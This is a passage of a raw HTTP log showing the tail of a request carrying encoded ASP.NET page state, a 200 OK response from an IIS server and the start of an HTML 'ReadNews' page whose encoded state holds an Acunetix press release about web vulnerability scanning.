ICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30486
          
          
          Response body (30486 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9ka